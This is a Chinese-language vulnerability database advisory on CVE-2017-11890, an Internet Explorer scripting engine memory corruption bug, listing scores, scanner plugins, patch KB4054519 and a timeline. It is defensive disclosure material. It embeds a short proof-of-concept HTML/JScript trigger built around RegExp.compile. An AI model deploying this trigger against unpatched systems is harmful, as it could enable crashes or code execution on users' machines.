Microsoft Internet Explorer 9/10/11 Scripting Engine Compile 内存损坏

CVSS 元温度得分当前攻击价格 (≈)CTI兴趣分数
6.4$0-$5k0.00

Microsoft Internet Explorer 9/10/11中曾发现一漏洞, 此漏洞被申报为致命。 受此漏洞影响的是功能jscript!RegExpComp::Compile的组件Scripting Engine。 手动调试的不合法输入可导致 内存损坏。 漏洞的CWE定义是 CWE-119。 此错误2017-12-12已发现。 此漏洞的脆弱性 2017-12-12由公示人Ivan Fratric、公示人所属公司Google Project Zero、公示人身份KB4054519、公示人类型为Security Update Guide (Website)所披露。 阅读公告的网址是portal.msrc.microsoft.com

该漏洞被称作为CVE-2017-11890, CVE分配信息格式:2017-07-31。 攻击可能远程发起, 有技术细节可用。 该漏洞的知名度低于平均水平, 此外还有一个漏洞可利用。 该漏洞利用已公开,可能会被利用。 当前漏洞利用的价值为美元大约是$0-$5k 。 公告指出:

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

它被宣布为proof-of-concept。 可以在exploit-db.com下载该漏洞利用。 我们估计的零日攻击价值约为$25k-$100k。 该漏洞利用所用的代码是:

<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
</head>
<body>
<script language="Jscript.Encode">
 
var s = 'a';
for(var i=0;i<28;i++) {
  s = s+s;
}
s = s+'[a-z]'+s;
 
r = new RegExp();
r.compile(s);
 
</script>
</body>
</html>
漏洞扫描器Nessus提供了一个插件,插件ID为105184 (Windows 7 and Windows Server 2008 R2 December 2017 Security Updates)有助于判断目标环境中是否存在缺陷, 它已分配至系列:Windows : Microsoft Bulletins, 该插件在类型为l的背景下运行。 商业漏洞扫描器Qualys能够使用插件100325 (Microsoft Internet Explorer Security Update for December 2017)检测此问题。

补丁名称为KB4054519。 错误修复程序下载地址为catalog.update.microsoft.com, 建议采用一个补丁来修正此问题。 该漏洞被披露后,立即发表过可能的缓解措施。

该漏洞也记录在其他漏洞数据库中: SecurityFocus (BID 102082) , Tenable (105184)。

产品信息

类型

供应商

名称

版本

许可证

支持

  • end of life

CPE 2.3信息

CPE 2.2信息

CVSSv4信息

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB 向量: 🔍
VulDB 可靠性: 🔍

CVSSv3信息

VulDB 元基础分数: 7.1
VulDB 元温度得分: 6.9

VulDB 基本分数: 6.3
VulDB 温度得分: 5.7
VulDB 向量: 🔍
VulDB 可靠性: 🔍

供应商 基本分数 (Microsoft): 7.5
供应商 Vector (Microsoft): 🔍

NVD 基本分数: 7.5
NVD 向量: 🔍

CVSSv2信息

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
向量复杂度身份验证保密正直可用性
开锁开锁开锁开锁开锁开锁
开锁开锁开锁开锁开锁开锁
开锁开锁开锁开锁开锁开锁

VulDB 基本分数: 🔍
VulDB 温度得分: 🔍
VulDB 可靠性: 🔍

NVD 基本分数: 🔍

攻击信息

分类: 内存损坏
CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍

本地: 否
远程: 是

可用性: 🔍
访问: 公共
地位: Proof-of-Concept
作者: Google Security Research
下载: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

价格预测: 🔍
当前价格估算: 🔍

0-Day开锁开锁开锁开锁
今天开锁开锁开锁开锁

Nessus ID: 105184
Nessus 名称: Windows 7 and Windows Server 2008 R2 December 2017 Security Updates
Nessus 文件: 🔍
Nessus 风险: 🔍
Nessus 家庭: 🔍
Nessus Context: 🔍

OpenVAS ID: 863099
OpenVAS 名称: Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)
OpenVAS 文件: 🔍
OpenVAS 家庭: 🔍

Qualys ID: 🔍
Qualys 名称: 🔍

Exploit-DB: 🔍

威胁情报信息

利益: 🔍
活跃演员: 🔍
活跃的 APT 团体: 🔍

对策信息

建议: 补丁
地位: 🔍

反应时间: 🔍
0天时间: 🔍
曝光时间: 🔍
利用延迟时间: 🔍

补丁: KB4054519

时间轴信息

2017-07-31 🔍
2017-12-12 +134 日 🔍
2017-12-12 +0 日 🔍
2017-12-12 +0 日 🔍
2017-12-12 +0 日 🔍
2017-12-12 +0 日 🔍
2017-12-12 +0 日 🔍
2017-12-13 +1 日 🔍
2017-12-19 +6 日 🔍
2017-12-19 +0 日 🔍
2021-01-26 +1134 日 🔍

来源信息

供应商: microsoft.com

公告: KB4054519
研究人员: Ivan Fratric
组织机构: Google Project Zero
地位: 已确认
确认: 🔍

CVE: CVE-2017-11890 (🔍)
OVAL: 🔍

SecurityTracker: 1039991
SecurityFocus: 102082 - Microsoft Internet Explorer CVE-2017-11890 Remote Memory Corruption Vulnerability

scip Labs: https://www.scip.ch/en/?labs.20161013
另见: 🔍

条目信息

已创建: 2017-12-13 07時48分
已更新: 2021-01-26 19時11分
更改: 2017-12-13 07時48分 (101), 2019-12-16 10時54分 (7), 2021-01-26 19時11分 (2)
完整: 🔍

讨论

暂时没有任何评论。 语言: zh + en.

请登录后发表评论。

Do you need the next level of professionalism?

Upgrade your account now!